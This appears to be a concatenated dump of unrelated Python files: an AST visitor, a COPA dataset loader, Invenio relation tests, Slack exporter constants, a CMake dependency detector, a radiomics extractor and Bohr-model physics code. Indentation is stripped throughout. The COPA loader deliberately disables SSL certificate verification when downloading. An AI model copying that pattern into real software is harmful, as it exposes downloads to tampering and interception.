if isinstance(ann_node.annotation, ast.List):
if node.func.attr == 'append':
if len(node.args) == 1:
type_node = self.get_type(node.args[0])
if type_node is not None:
ann_node.annotation.elts[0] = type_node
self.context.incomplete_variables.pop(name)
self.context.define_variable(name, None)
elif node.func.attr == 'extend':
if len(node.args) == 1:
type_node = self.get_type(node.args[0])
if type_node is not None:
ann_node.annotation = type_node
self.context.incomplete_variables.pop(name)
self.context.define_variable(name, None)
return node
def get_type(self, node):
return TypeVisitor(self).visit(node)
def visit_FunctionDef(self, node):
self.context = Context(self.module_definitions, self.definitions)
for arg in node.args.args:
if arg.arg != 'self':
self.context.define_variable(arg.arg, None)
self.returns = node.returns
for i, item in enumerate(node.body):
node.body[i] = self.visit(item)
for assign_node, _ in self.context.incomplete_variables.values():
raise CompileError('cannot infer variable type', assign_node)
self.context = None
return node
class ForLoopTargetVisitor(ast.NodeVisitor):
def __init__(self, context):
self.context = context
def visit_Name(self, node):
self.context.define_variable(node.id, None)
| 2.515625
| 3
|
itrain/ext/datasets/copa.py
|
qpoiPeng/efficient-task-transfer
| 11
|
12777957
|
<gh_stars>10-100
import os
import urllib.request
from xml.dom import minidom
import datasets
import requests
_CITATION = """\
@inproceedings{roemmele2011choice,
title={Choice of Plausible Alternatives: An Evaluation of Commonsense Causal Reasoning.},
author={<NAME> and <NAME> and <NAME>},
booktitle={AAAI spring symposium: logical formalizations of commonsense reasoning},
pages={90--95},
year={2011}
}
"""
_DESCRIPTION = """\
The Choice Of Plausible Alternatives (COPA) evaluation provides researchers with a tool for assessing progress in open-domain commonsense causal reasoning. COPA consists of 1000 questions, split equally into development and test sets of 500 questions each. Each question is composed of a premise and two alternatives, where the task is to select the alternative that more plausibly has a causal relation with the premise. The correct alternative is randomized so that the expected performance of randomly guessing is 50%.
"""
_DOWNLOAD_URL = "https://people.ict.usc.edu/~gordon/downloads/COPA-resources.tgz"
class COPA(datasets.GeneratorBasedBuilder):
"""The Choice Of Plausible Alternatives (COPA) dataset."""
def _info(self):
return datasets.DatasetInfo(
description=_DESCRIPTION,
features=datasets.Features(
{
"id": datasets.Value("string"),
"premise": datasets.Value("string"),
"alternative1": datasets.Value("string"),
"alternative2": datasets.Value("string"),
"relation": datasets.Value("string"),
"label": datasets.Value("string"),
}
),
supervised_keys=None,
homepage="https://people.ict.usc.edu/~gordon/copa.html",
citation=_CITATION,
)
def _split_generators(self, dl_manager):
"""Returns SplitGenerators."""
def _download(src_url, dst_path):
# ignore SSL certificate verification during download
response = requests.get(src_url, stream=True, verify=False)
with open(dst_path, "wb") as f:
for data in response.iter_content():
f.write(data)
return dst_path
dl_dir = dl_manager.extract(dl_manager.download_custom(_DOWNLOAD_URL, _download))
data_dir = os.path.join(dl_dir, "COPA-resources", "datasets")
return [
datasets.SplitGenerator(
name=datasets.Split.TRAIN,
gen_kwargs={"filepath": os.path.join(data_dir, "copa-dev.xml")},
),
datasets.SplitGenerator(
name=datasets.Split.TEST,
gen_kwargs={"filepath": os.path.join(data_dir, "copa-test.xml")},
),
]
def _generate_examples(self, filepath):
data = minidom.parse(filepath)
items = data.getElementsByTagName("item")
for item in items:
index = item.attributes["id"].value
yield index, {
"id": index,
"premise": item.getElementsByTagName("p")[0].firstChild.data,
"alternative1": item.getElementsByTagName("a1")[0].firstChild.data,
"alternative2": item.getElementsByTagName("a2")[0].firstChild.data,
"relation": item.attributes["asks-for"].value,
"label": item.attributes["most-plausible-alternative"].value,
}
| 2.640625
| 3
|
tests/api/ils/records_relations/test_records_relations_siblings.py
|
topless/invenio-app-ils
| 0
|
12777958
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2020 CERN.
#
# invenio-app-ils is free software; you can redistribute it and/or modify it
# under the terms of the MIT License; see LICENSE file for more details.
"""Test records relations siblings."""
import json
from flask import url_for
from invenio_app_ils.documents.api import Document
from tests.helpers import get_test_record, user_login
from .helpers import (recrel_assert_record_relations,
recrel_choose_endpoints_and_do_request)
def _test_sibl_language_relation(client, json_headers):
"""Test creation/deletion siblings language relations."""
first_pid_value = "docid-1"
first_pid_type = "docid"
second_pid_value = "docid-2"
second_pid_type = "docid"
third_pid_value = "docid-6"
third_pid_type = "docid"
relation_type = "language"
payload = [
{
"pid_value": second_pid_value,
"pid_type": second_pid_type,
"relation_type": relation_type,
},
{
"pid_value": third_pid_value,
"pid_type": third_pid_type,
"relation_type": relation_type,
},
]
def _test_create():
"""Test relation creation."""
rec1, rec2 = recrel_choose_endpoints_and_do_request(
(client, json_headers, "POST"),
(
first_pid_value,
first_pid_type,
second_pid_value,
second_pid_type,
),
payload,
)
rec3 = Document.get_record_by_pid(third_pid_value)
rec3 = rec3.replace_refs()
recrel_assert_record_relations(
rec1,
expected={
"relations": {
"language": [
{
"pid_value": second_pid_value,
"pid_type": second_pid_type,
"relation_type": "language",
"record_metadata": {
"title": rec2["title"],
"languages": rec2["languages"],
"document_type": rec2["document_type"],
"publication_year": rec2["publication_year"],
},
},
{
"pid_value": third_pid_value,
"pid_type": third_pid_type,
"relation_type": "language",
"record_metadata": {
"title": rec3["title"],
"document_type": rec3["document_type"],
"languages": rec3["languages"],
"publication_year": rec3["publication_year"],
},
},
]
}
},
)
recrel_assert_record_relations(
rec2,
expected={
"relations": {
"language": [
{
"pid_value": first_pid_value,
"pid_type": first_pid_type,
"relation_type": "language",
"record_metadata": {
"title": rec1["title"],
"languages": rec1["languages"],
"edition": rec1["edition"],
"document_type": rec1["document_type"],
"publication_year": rec1["publication_year"],
},
},
{
"pid_value": third_pid_value,
"pid_type": third_pid_type,
"relation_type": "language",
"record_metadata": {
"title": rec3["title"],
"languages": rec3["languages"],
"document_type": rec3["document_type"],
"publication_year": rec3["publication_year"],
},
},
]
}
},
)
recrel_assert_record_relations(
rec3,
expected={
"relations": {
"language": [
{
"pid_value": first_pid_value,
"pid_type": first_pid_type,
"relation_type": "language",
"record_metadata": {
"title": rec1["title"],
"languages": rec1["languages"],
"edition": rec1["edition"],
"document_type": rec1["document_type"],
"publication_year": rec1["publication_year"],
},
},
{
"pid_value": second_pid_value,
"pid_type": second_pid_type,
"relation_type": "language",
"record_metadata": {
"title": rec2["title"],
"languages": rec2["languages"],
"document_type": rec2["document_type"],
"publication_year": rec2["publication_year"],
},
},
]
}
},
)
def _test_delete():
"""Test relation creation."""
rec1, rec2 = recrel_choose_endpoints_and_do_request(
(client, json_headers, "DELETE"),
(
first_pid_value,
first_pid_type,
second_pid_value,
second_pid_type,
),
payload,
)
rec3 = Document.get_record_by_pid(third_pid_value)
rec3 = rec3.replace_refs()
recrel_assert_record_relations(rec1, expected={"relations": {}})
recrel_assert_record_relations(rec2, expected={"relations": {}})
recrel_assert_record_relations(rec3, expected={"relations": {}})
_test_create()
_test_delete()
# recreate for the next one, to have some more valuable test data
_test_create()
def _test_sibl_edition_relation(client, json_headers, testdata):
"""Test creation/deletion siblings edition relations."""
first_pid_value = "docid-3"
first_pid_type = "docid"
second_pid_value = "docid-1"
second_pid_type = "docid"
relation_type = "edition"
payload = {
"pid_value": second_pid_value,
"pid_type": second_pid_type,
"relation_type": relation_type,
}
def _test_create():
"""Test relation creation."""
rec1, rec2 = recrel_choose_endpoints_and_do_request(
(client, json_headers, "POST"),
(
first_pid_value,
first_pid_type,
second_pid_value,
second_pid_type,
),
payload,
)
recrel_assert_record_relations(
rec1,
expected={
"relations": {
"edition": [
{
"pid_value": second_pid_value,
"pid_type": second_pid_type,
"relation_type": "edition",
"record_metadata": {
"title": rec2["title"],
"edition": rec2["edition"],
"languages": rec2["languages"],
"document_type": rec2["document_type"],
"publication_year": rec2["publication_year"],
},
}
]
}
},
)
rec_docid_2 = get_test_record(testdata, "documents", "docid-2")
rec_docid_6 = get_test_record(testdata, "documents", "docid-6")
recrel_assert_record_relations(
rec2,
expected={
"relations": {
"edition": [
{
"pid_value": first_pid_value,
"pid_type": first_pid_type,
"relation_type": "edition",
"record_metadata": {
"title": rec1["title"],
"edition": rec1["edition"],
"document_type": rec1["document_type"],
"publication_year": rec1["publication_year"],
},
}
],
"language": [
{
"pid_value": rec_docid_2["pid"],
"pid_type": "docid",
"relation_type": "language",
"record_metadata": {
"title": rec_docid_2["title"],
"languages": rec_docid_2["languages"],
"document_type": rec_docid_2["document_type"],
"publication_year": rec_docid_2[
"publication_year"
],
},
},
{
"pid_value": rec_docid_6["pid"],
"pid_type": "docid",
"relation_type": "language",
"record_metadata": {
"title": rec_docid_6["title"],
"document_type": rec_docid_6["document_type"],
"languages": rec_docid_6['languages'],
"publication_year": rec_docid_6[
"publication_year"
],
},
},
],
}
},
)
def _test_delete():
"""Test relation creation."""
rec1, rec2 = recrel_choose_endpoints_and_do_request(
(client, json_headers, "DELETE"),
(
first_pid_value,
first_pid_type,
second_pid_value,
second_pid_type,
),
payload,
)
recrel_assert_record_relations(rec1, expected={"relations": {}})
rec_docid_2 = get_test_record(testdata, "documents", "docid-2")
rec_docid_6 = get_test_record(testdata, "documents", "docid-6")
recrel_assert_record_relations(
rec2,
expected={
"relations": {
"language": [
{
"pid_value": rec_docid_2["pid"],
"pid_type": "docid",
"relation_type": "language",
"record_metadata": {
"title": rec_docid_2["title"],
"languages": rec_docid_2["languages"],
"document_type": rec_docid_2["document_type"],
"publication_year": rec_docid_2[
"publication_year"
],
},
},
{
"pid_value": rec_docid_6["pid"],
"pid_type": "docid",
"relation_type": "language",
"record_metadata": {
"title": rec_docid_6["title"],
"document_type": rec_docid_6["document_type"],
"languages": rec_docid_6["languages"],
"publication_year": rec_docid_6[
"publication_year"
],
},
},
]
}
},
)
def _test_empty_edition_field():
edition_first_pid_value = "docid-11"
edition_first_pid_type = "docid"
edition_second_pid_value = "docid-12"
edition_second_pid_type = "docid"
create_payload = {
"pid_value": edition_second_pid_value,
"pid_type": edition_second_pid_type,
"relation_type": relation_type,
}
rec1, rec2 = recrel_choose_endpoints_and_do_request(
(client, json_headers, "POST"),
(
edition_first_pid_value,
edition_first_pid_type,
edition_second_pid_value,
edition_second_pid_type,
),
create_payload,
expect_status_code=400
)
_test_create()
_test_delete()
# recreate for the next one, to have some more valuable test data
_test_create()
_test_empty_edition_field()
def _test_sibl_other_relation(client, json_headers, testdata):
"""Test creation/deletion siblings other relations."""
first_pid_value = "docid-2"
first_pid_type = "docid"
second_pid_value = "docid-3"
second_pid_type = "docid"
relation_type = "other"
payload = {
"pid_value": second_pid_value,
"pid_type": second_pid_type,
"relation_type": relation_type,
"note": "exercise",
}
def _test_create():
"""Test relation creation."""
rec1, rec2 = recrel_choose_endpoints_and_do_request(
(client, json_headers, "POST"),
(
first_pid_value,
first_pid_type,
second_pid_value,
second_pid_type,
),
payload,
)
rec_docid_1 = get_test_record(testdata, "documents", "docid-1")
rec_docid_6 = get_test_record(testdata, "documents", "docid-6")
recrel_assert_record_relations(
rec1,
expected={
"relations_extra_metadata": {
"other": [
{
"pid_value": second_pid_value,
"pid_type": second_pid_type,
"note": "exercise",
}
]
},
"relations": {
"language": [
{
"pid_value": rec_docid_1["pid"],
"pid_type": "docid",
"relation_type": "language",
"record_metadata": {
"title": rec_docid_1["title"],
"edition": rec_docid_1["edition"],
"languages": rec_docid_1["languages"],
"document_type": rec_docid_1["document_type"],
"publication_year": rec_docid_1[
"publication_year"
],
},
},
{
"pid_value": rec_docid_6["pid"],
"pid_type": "docid",
"relation_type": "language",
"record_metadata": {
"title": rec_docid_6["title"],
"document_type": rec_docid_6["document_type"],
"languages": rec_docid_6["languages"],
"publication_year": rec_docid_6[
"publication_year"
],
},
},
],
"other": [
{
"pid_value": second_pid_value,
"pid_type": second_pid_type,
"note": "exercise",
"relation_type": "other",
"record_metadata": {
"title": rec2["title"],
"edition": rec2["edition"],
"document_type": rec2["document_type"],
"publication_year": rec2["publication_year"],
},
}
],
},
},
)
recrel_assert_record_relations(
rec2,
expected={
"relations": {
"edition": [
{
"pid_value": rec_docid_1["pid"],
"pid_type": "docid",
"relation_type": "edition",
"record_metadata": {
"title": rec_docid_1["title"],
"edition": rec_docid_1["edition"],
"languages": rec_docid_1["languages"],
"document_type": rec_docid_1["document_type"],
"publication_year": rec_docid_1[
"publication_year"
],
},
}
],
"other": [
{
"pid_value": first_pid_value,
"pid_type": first_pid_type,
"note": "exercise",
"relation_type": "other",
"record_metadata": {
"title": rec1["title"],
"languages": rec1["languages"],
"document_type": rec1["document_type"],
"publication_year": rec1["publication_year"],
},
}
],
}
},
)
def _test_delete():
"""Test relation creation."""
rec1, rec2 = recrel_choose_endpoints_and_do_request(
(client, json_headers, "DELETE"),
(
first_pid_value,
first_pid_type,
second_pid_value,
second_pid_type,
),
payload,
)
rec_docid_1 = get_test_record(testdata, "documents", "docid-1")
rec_docid_6 = get_test_record(testdata, "documents", "docid-6")
recrel_assert_record_relations(
rec1,
expected={
"relations": {
"language": [
{
"pid_value": rec_docid_1["pid"],
"pid_type": "docid",
"relation_type": "language",
"record_metadata": {
"title": rec_docid_1["title"],
"edition": rec_docid_1["edition"],
"languages": rec_docid_1["languages"],
"document_type": rec_docid_1["document_type"],
"publication_year": rec_docid_1[
"publication_year"
],
},
},
{
"pid_value": rec_docid_6["pid"],
"pid_type": "docid",
"relation_type": "language",
"record_metadata": {
"title": rec_docid_6["title"],
"document_type": rec_docid_6["document_type"],
"languages": rec_docid_6["languages"],
"publication_year": rec_docid_6[
"publication_year"
],
},
},
]
}
},
)
recrel_assert_record_relations(
rec2,
expected={
"relations": {
"edition": [
{
"pid_value": rec_docid_1["pid"],
"pid_type": "docid",
"relation_type": "edition",
"record_metadata": {
"title": rec_docid_1["title"],
"edition": rec_docid_1["edition"],
"languages": rec_docid_1["languages"],
"document_type": rec_docid_1["document_type"],
"publication_year": rec_docid_1[
"publication_year"
],
},
}
]
}
},
)
_test_create()
_test_delete()
# recreate for the next one, to have some more valuable test data
_test_create()
def _test_sibl_invalid_relations_should_fail(
client, json_headers, invalids, status_code=400
):
"""Test relation creation with invalid siblings should fail."""
api_endpoint_documents = "invenio_app_ils_relations.docid_relations"
api_endpoint_series = "invenio_app_ils_relations.serid_relations"
for invalid in invalids:
first_pid_value = invalid["first_pid_value"]
first_pid_type = invalid["first_pid_type"]
second_pid_value = invalid["second_pid_value"]
second_pid_type = invalid["second_pid_type"]
relation_type = invalid["relation_type"]
api_endpoint = (
api_endpoint_documents
if first_pid_type == "docid"
else api_endpoint_series
)
url = url_for(api_endpoint, pid_value=first_pid_value)
payload = {
"pid_value": second_pid_value,
"pid_type": second_pid_type,
"relation_type": relation_type,
}
res = client.post(url, headers=json_headers, data=json.dumps(payload))
assert res.status_code == status_code
if status_code == 400:
error = json.loads(res.data.decode("utf-8"))
assert "message" in error
assert first_pid_value in error["message"]
assert second_pid_value in error["message"]
def test_siblings_relations(client, json_headers, testdata, users):
"""Test siblings relations."""
# only one test method to speed up tests and avoid testdata recreation at
# each test. As drawback, testdata is not cleaned between each test, so
# do not change the order of execution of the following tests :)
_test_sibl_invalid_relations_should_fail(
client,
json_headers,
[
{
"first_pid_value": "docid-1",
"first_pid_type": "docid",
"second_pid_value": "docid-2",
"second_pid_type": "docid",
"relation_type": "language",
}
],
status_code=401,
)
user_login(client, "librarian", users)
# docid-1 --language--> docid-2 and docid-6
_test_sibl_language_relation(client, json_headers)
# docid-3 --edition--> docid-1
_test_sibl_edition_relation(client, json_headers, testdata)
# docid-2 --other--> docid-3
_test_sibl_other_relation(client, json_headers, testdata)
# test wrong relations
invalids = [
# different pid type
{
"first_pid_value": "docid-1",
"first_pid_type": "docid",
"second_pid_value": "serid-1",
"second_pid_type": "serid",
"relation_type": "language",
},
# invalid edition: document with serial
{
"first_pid_value": "serid-3",
"first_pid_type": "serid",
"second_pid_value": "docid-5",
"second_pid_type": "docid",
"relation_type": "edition",
},
# different pid type
{
"first_pid_value": "serid-1",
"first_pid_type": "serid",
"second_pid_value": "docid-1",
"second_pid_type": "docid",
"relation_type": "other",
},
# same record
{
"first_pid_value": "docid-6",
"first_pid_type": "docid",
"second_pid_value": "docid-6",
"second_pid_type": "docid",
"relation_type": "language",
},
]
_test_sibl_invalid_relations_should_fail(client, json_headers, invalids)
| 1.898438
| 2
|
test/unit_tests_bible_yaml_downloader.py
|
daniel-tran/meaningless
| 0
|
12777959
|
<gh_stars>0
import unittest
import sys
sys.path.append('../')
from meaningless import YAMLDownloader, yaml_file_interface
# These tests just test for certain components which differ from the base downloader
class UnitTests(unittest.TestCase):
# Note: Tests will only be run if they are prefixed with test_ in their method name.
# All other methods will simply be interpreted as test helper functions.
def test_yaml_downloader_settings(self):
bible = YAMLDownloader()
self.assertEqual(bible.file_extension, '.yaml', 'Extension is incorrect')
self.assertEqual(bible.file_writing_function.__module__, yaml_file_interface.write.__module__,
'Module of writing function is incorrect')
self.assertEqual(bible.file_writing_function.__name__, yaml_file_interface.write.__name__,
'Name of writing function is incorrect')
if __name__ == "__main__":
unittest.main()
| 3
| 3
|
exporter/constants.py
|
KTOmega/Slack-Exporter
| 0
|
12777960
|
CONVERSATIONS_EXPORT_DIR = "conversations"
CONVERSATIONS_JSON_FILE = "conversations.json"
CONVERSATIONS_TYPES = "public_channel,private_channel,mpim,im"
CONTEXT_JSON_FILE = "metadata.json"
EMOJI_EXPORT_DIR = "emoji"
EMOJI_JSON_FILE = "emoji.json"
FILES_EXPORT_DIR = "files"
FILES_JSON_FILE = "files.json"
HISTORY_JSON_DIR = "history"
ITEM_COUNT_LIMIT = 1000
PINS_JSON_FILE = "pins.json"
REMINDERS_JSON_FILE = "reminders.json"
REPLIES_KEY = "$replies"
TEAM_EXPORT_DIR = "team"
TEAM_JSON_FILE = "team.json"
USERS_EXPORT_DIR = "users"
USERS_JSON_FILE = "users.json"
| 1.132813
| 1
|
Exercicios de Tuplas/ex075.py
|
ChristianSantos88/Python
| 1
|
12777961
|
'''
Desenvolva um programa que leia quatro valores pelo teclado e guarde-os em uma tupla. No final, mostre:
a) Quantas vezes apareceu o valor 9;
b) Em que posição foi digitado o primeiro valor 3;
c) Quais foram os números pares.
'''
num = tuple(int(input('Digite um valor: ')) for c in range(0, 4))
cont_nove = 0
pos_tres = 0
print(f'Números gerados: {num}')
if 9 in num:
print(f'O número 09 apareceu {num.count(9)} vez(es).')
if 3 in num:
pos_tres = num.index(3)
print(f'O número 03 aparece pela primeira vez na {pos_tres + 1}ª posição.')
print(f'Número(s) par(es) gerado(s): ', end='')
for n in num:
if n % 2 == 0:
print(n, end=' ')
| 4.03125
| 4
|
detect_system_deps.py
|
rbrich/xcik
| 11
|
12777962
|
<reponame>rbrich/xcik
#!/usr/bin/env python3
import sys
import yaml
import tempfile
import textwrap
from pathlib import Path
from subprocess import run, DEVNULL
script_dir = Path(__file__).parent
def debug(_msg):
pass
def parse_args():
import argparse
ap = argparse.ArgumentParser()
ap.add_argument('option', type=str, nargs='*',
help="Project option from conanfile.py that are set to True.")
ap.add_argument("-v", "--verbose", action="store_true",
help="Print generated CMakeLists.txt, cmake command-line and full output.")
args = ap.parse_args()
if args.verbose:
global debug
debug = lambda msg: print(msg)
return args.option
def requirements():
with open(script_dir.joinpath('conandata.yml'), newline='') as conandata:
return yaml.safe_load(conandata)['requirements']
def filtered_requirements(options):
for name, info in requirements().items():
if 'prereq' not in info or set(info['prereq']).intersection(set(options)):
yield name, info
def detect_deps(reqs):
cmake_name_to_sysopt = {info['cmake'].split('/')[0]
: f"system_{name}" if 'conan' in info else f"with_{name}"
for name, info in reqs}
items = ';'.join(info['cmake'] for _, info in reqs)
with tempfile.TemporaryDirectory() as tmp_dir:
# Convert the path to posix (forward slashes) even on Windows.
# Paths with backslashes are not supported by CMake.
custom_modules = '"' + str(script_dir.joinpath('cmake').as_posix()) + '"'
cml = textwrap.dedent("""
cmake_minimum_required(VERSION 3.13)
project(SystemPackageFinder CXX)
list(APPEND CMAKE_MODULE_PATH """ + custom_modules + """)
foreach (ITEM IN LISTS DEPS)
string(REPLACE "/" ";" ITEM ${ITEM})
list(GET ITEM 0 NAME)
list(GET ITEM 1 VERSION)
message(STATUS "Find ${NAME} ${VERSION}")
find_package(${NAME} ${VERSION})
if (${NAME}_FOUND)
message(NOTICE "FOUND ${NAME} ${${NAME}_VERSION}")
endif()
endforeach()
""")
debug(cml)
with open(tmp_dir + "/CMakeLists.txt", 'w') as f:
f.write(cml)
# Prefer ninja if available. Needed to allow choice, otherwise `make` installation
# would be required on unixes, as it's the default in cmake.
ninja = ""
if run("command -v ninja", shell=True, stdout=DEVNULL, stderr=DEVNULL).returncode == 0:
ninja = "-G Ninja"
cmd = f"cmake . {ninja} -DDEPS='{items}'"
debug(cmd)
p = run(cmd, shell=True,
capture_output=True, encoding='UTF-8', cwd=tmp_dir)
debug(p.stdout)
if p.returncode != 0:
print(f'Failed:\n{p.stderr}', file=sys.stderr)
return
for line in p.stderr.splitlines():
if line.startswith('FOUND '):
_, name, version = line.split(' ')
print(f"Found: {name} {version}")
yield cmake_name_to_sysopt[name]
def main():
options = parse_args()
reqs = tuple(filtered_requirements(options))
deps = tuple(detect_deps(reqs))
print(' '.join(f'-DXCI_{o.upper()}=ON' for o in deps if o.startswith('with_')))
print(' '.join(f'-o xcikit:{o}=True' for o in deps))
if __name__ == '__main__':
main()
| 2.203125
| 2
|
mlrun/api/crud/__init__.py
|
katyakats/mlrun
| 0
|
12777963
|
<reponame>katyakats/mlrun<filename>mlrun/api/crud/__init__.py
from .artifacts import Artifacts # noqa: F401
from .feature_store import FeatureStore # noqa: F401
from .functions import Functions # noqa: F401
from .logs import Logs # noqa: F401
from .pipelines import Pipelines # noqa: F401
from .projects import Projects # noqa: F401
from .runs import Runs # noqa: F401
from .runtimes import Runtimes # noqa: F401
| 1.109375
| 1
|
output/models/nist_data/list_pkg/boolean/schema_instance/nistschema_sv_iv_list_boolean_pattern_3_xsd/__init__.py
|
tefra/xsdata-w3c-tests
| 1
|
12777964
|
<reponame>tefra/xsdata-w3c-tests
from output.models.nist_data.list_pkg.boolean.schema_instance.nistschema_sv_iv_list_boolean_pattern_3_xsd.nistschema_sv_iv_list_boolean_pattern_3 import NistschemaSvIvListBooleanPattern3
__all__ = [
"NistschemaSvIvListBooleanPattern3",
]
| 0.804688
| 1
|
problems/p019.py
|
10jmellott/ProjectEuler
| 0
|
12777965
|
<gh_stars>0
"""<a href="https://projecteuler.net/problem=19" class="title-custom-link">Counting Sundays</a>
You are given the following information, but you may prefer to do some research for yourself.
1 Jan 1900 was a Monday.
Thirty days has September,
April, June and November.
All the rest have thirty-one,
Saving February alone,
Which has twenty-eight, rain or shine.
And on leap years, twenty-nine.
A leap year occurs on any year evenly divisible by 4, but not on a century unless it is divisible by 400.
How many Sundays fell on the first of the month during the twentieth century (1 Jan 1901 to 31 Dec 2000)?
"""
def is_leap_year(year):
return year % 4 == 0 and (year % 100 != 0 or year % 400 == 0)
def main():
"""Solves this problem
Incremented each day and checked from Jan 1st, 1900
(excluded any match in 1900 until 1901 was reached)
Used this for testing: [https://www.onthisday.com/](https://www.onthisday.com/)
Returns:
Integer: Solution to this problem
"""
# Set the arrays for days in a month
months = [31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]
months_ly = [31, 29, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]
# Initilized using the data provided - 0 indexed day & month - so you add one to get the actual date
dow = 1
day = 0
month = 0
year = 1900
# Set the starting count to 0
count = 0
# Until we leave the 20th century
while year < 2001:
# determine months dataset
m = months
if is_leap_year(year):
m = months_ly
# Increment Count if applicable
if day == 0 and dow == 0:
if year > 1900:
count += 1
# Increment Day of Week
dow += 1
dow %= 7
# Increment Day and cayy over into month & year
day += 1
if day >= m[month]:
day = 0
month += 1
if month > 11:
month = 0
year += 1
return count
| 3.921875
| 4
|
src/radiomics_extractor.py
|
SCAN-NRAD/DL-DiReCT
| 12
|
12777966
|
import argparse
import os
import sys
import radiomics
import SimpleITK as sitk
import csv
import pandas as pd
LABELS_FS = ['Left-Lateral-Ventricle', 'Left-Inf-Lat-Vent', 'Left-Thalamus-Proper', 'Left-Caudate', 'Left-Putamen', 'Left-Pallidum', '3rd-Ventricle',
'4th-Ventricle', 'Brain-Stem', 'Left-Hippocampus', 'Left-Amygdala', 'Left-Accumbens-area', 'Left-VentralDC', 'Left-choroid-plexus',
'Right-Lateral-Ventricle', 'Right-Inf-Lat-Vent', 'Right-Thalamus-Proper', 'Right-Caudate', 'Right-Putamen', 'Right-Pallidum', 'Right-Hippocampus',
'Right-Amygdala', 'Right-Accumbens-area', 'Right-VentralDC', 'Right-choroid-plexus', '5th-Ventricle',
'CC_Posterior', 'CC_Mid_Posterior', 'CC_Central', 'CC_Mid_Anterior', 'CC_Anterior']
LABELS_DL = ['Left-Ventricle-all:101', 'Left-Thalamus-Proper', 'Left-Caudate', 'Left-Putamen', 'Left-Pallidum', 'Left-Hippocampus', 'Left-Amygdala',
'Left-Accumbens-area', 'Left-VentralDC', 'Right-Ventricle-all:112', 'Right-Thalamus-Proper', 'Right-Caudate', 'Right-Putamen',
'Right-Pallidum', 'Right-Hippocampus', 'Right-Amygdala', 'Right-Accumbens-area', 'Right-VentralDC', 'Brain-Stem',
'3rd-Ventricle', '4th-Ventricle', 'Corpus-Callosum:125']
def lut_parse():
lut = pd.read_csv('{}/fs_lut.csv'.format(os.path.dirname(os.path.realpath(sys.argv[0]))))
lut = dict(zip(lut.Key, lut.Label))
return lut
def main(subject_dirs, aseg_file, labels, results_csv):
LUT = lut_parse()
print(results_csv)
with open(results_csv, 'w') as out_file:
writer = csv.writer(out_file, delimiter=',')
header = None
for subjects_dir in subject_dirs:
for subject_name in os.listdir(subjects_dir):
fname = '{}/{}/{}'.format(subjects_dir, subject_name, aseg_file)
if not os.path.exists(fname):
print('{}: {} not found. Skipping'.format(subject_name, aseg_file))
continue
print(subject_name)
fields = list()
values = list()
img = sitk.ReadImage(fname)
for label in labels:
if ':' in label:
label, label_id = label.split(':')
else:
label_id = LUT[label]
radiomics.setVerbosity(50)
shape_features = radiomics.shape.RadiomicsShape(img, img, **{'label': int(label_id)})
shape_features.enableAllFeatures()
results = shape_features.execute()
for key in results.keys():
fields.append('{}.{}'.format(label, key))
values.append(float(results[key]) if results['VoxelVolume'] > 0 else 'nan')
if header is None:
header = fields
writer.writerow(['Subject'] + header)
else:
assert header == fields
writer.writerow([subject_name] + values)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Extract radiomics features from subjects')
parser.add_argument(
'--aseg_file',
type=str,
default='T1w_norm_seg.nii.gz',
help='Path (relative to subject dir) of aseg segmentation file.'
)
parser.add_argument(
'--labels',
type=str,
nargs='+',
metavar='label',
default=['DL'],
help='List of labels. FreeSurfer ids (from fs_lut) are used per default. '
'Can also be: label:id. Example: "Left-Hippocampus:9 Right-Hippocampus:21." '
'Use "FS" for all FreeSurfer labels or "DL" for all DL+DiReCT labels'
)
parser.add_argument(
'--results_csv',
type=str,
required=True,
help='CSV-File to store results'
)
parser.add_argument(
'subject_dirs',
metavar='dir',
type=str,
nargs='+',
help='Directories with subjects (FreeSurfer or DL+DiReCT results dir)'
)
args = parser.parse_args()
for dir in args.subject_dirs:
if not os.path.exists(dir):
print('{} not found'.format(args.subjects_dir))
sys.exit(1)
labels = LABELS_FS if args.labels[0] == 'FS' else LABELS_DL if args.labels[0] == 'DL' else args.labels
main(args.subject_dirs, args.aseg_file, labels, args.results_csv)
| 1.820313
| 2
|
New folder/project_BSW.py
|
bswood9321/PHYS-3210
| 0
|
12777967
|
<filename>New folder/project_BSW.py
# -*- coding: utf-8 -*-
"""
Created on Mon Nov 11 22:17:26 2019
@author: Brandon
"""
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
e0=8.8541878128e-12
echarge=1.60217662e-19
hbar=1.0545718e-34
me=9.10938356e-31
a0=5.29177210903e-11
c=299792458
h=6.6260693e-34
def r(n):
rn=(4*np.pi*e0*(hbar**2)*n**2)/(me*(echarge**2))
return rn/a0
def v(n):
vn=hbar/(me*a0*n)
return vn
def p(n):
pn=hbar/(a0*n)
return pn/1e-24
def E(n):
En=-((me*(echarge**4))/(32*(np.pi**2)*(e0**2)*(hbar**2)))*(1/(n**2))
En=En*6.242e18
return En
def delE(m,n):
delE=np.absolute(E(m)-E(n))
return delE
def photonwavel(delE):
l=h*c/(delE*1.60218e-19)
return l
def photonfreq(l):
f=c/l
return f
def Zr(z,n):
Zr=(4*np.pi*e0*(hbar**2)*n**2)/(me*z*(echarge**2))
return Zr
def Ze(z,n):
Zn=-((me*(z**2)*(echarge**4))/(32*(np.pi**2)*(e0**2)*(hbar**2)))*(1/(n**2))
Zn=Zn*6.242e18
return Zn
def delZe(z,m,n):
delZe=np.absolute(Ze(z,m)-Ze(z,n))
return delZe
def prob_1s(x,y,z):
r=np.sqrt(np.square(x)+np.square(y)+np.square(z))
return np.square((2/(np.sqrt(np.pi)))*np.e**(-r))
x=np.linspace(-5,5,30)
y=np.linspace(-5,5,30)
z=np.linspace(-5,5,30)
elements = []
probability = []
for ix in x:
for iy in y:
for iz in z:
elements.append(str((ix,iy,iz)))
probability.append(prob_1s(ix,iy,iz))
probability = probability/sum(probability)
coord = np.random.choice(elements, size=100000, replace=True, p=probability)
elem_mat = [i.split(',') for i in coord]
elem_mat = np.matrix(elem_mat)
x_coords = [float(i.item()[1:]) for i in elem_mat[:,0]]
y_coords = [float(i.item()) for i in elem_mat[:,1]]
z_coords = [float(i.item()[0:-1]) for i in elem_mat[:,2]]
fig = plt.figure(figsize=(10,10))
ax = fig.add_subplot(111, projection='3d')
ax.scatter(x_coords, y_coords, z_coords, alpha=0.05)
ax.set_title("Hydrogen 1s density")
plt.show()
def prob_2s(x,y,z):
r=np.sqrt(np.square(x)+np.square(y)+np.square(z))
